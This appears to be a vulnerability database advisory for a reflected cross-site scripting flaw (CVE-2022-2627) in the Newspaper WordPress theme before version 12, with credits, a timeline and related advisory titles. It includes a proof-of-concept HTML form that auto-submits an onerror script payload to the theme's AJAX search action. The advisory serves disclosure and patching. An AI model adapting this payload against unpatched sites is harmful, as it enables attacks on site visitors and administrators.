Newspaper < 12 – Reflected Cross-Site Scripting | CVE 2022-2627 | Theme Vulnerabilities

Description

The theme does not sanitise a parameter before outputting it back in an HTML attribute via an AJAX action, leading to a Reflected Cross-Site Scripting.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="td_ajax_search" />
      <input type="hidden" name="td_string" value="<img src=a onerror=alert(/XSS/)>" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Affects Themes

Fixed in 12

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Ramon Dunker

Submitter

Ramon Dunker

Submitter website

https://ramondunker.nl

Submitter twitter

Verified

Yes

WPVDB ID

038327d0-568f-4011-9b7e-3da39e8b6aea

Timeline

Publicly Published

2022-10-10 (about 1 years ago)

Added

2022-10-10 (about 1 years ago)

Last Updated

2022-10-10 (about 1 years ago)

Other

Published

Title

Published

2023-05-11

Title

DevBuddy Twitter Feed <= 4.0.0 - Admin+ Stored XSS

Published

2024-03-20

Title

Advanced Access Manager < 6.9.21 - Reflected XSS

Published

2020-02-26

Title

Easy Forms for Mailchimp < 6.6.3 - Authenticated Cross-Site Scripting (XSS)

Published

2024-05-01

Title

Supreme Modules Lite – Divi Theme, Extra Theme and Divi Builder < 2.5.4 - Contrib+ DOM-Based Cross-Site Scripting

Published

2023-04-26

Title

WP Inventory Manager < 2.1.0.13 - Reflected Cross-Site Scripting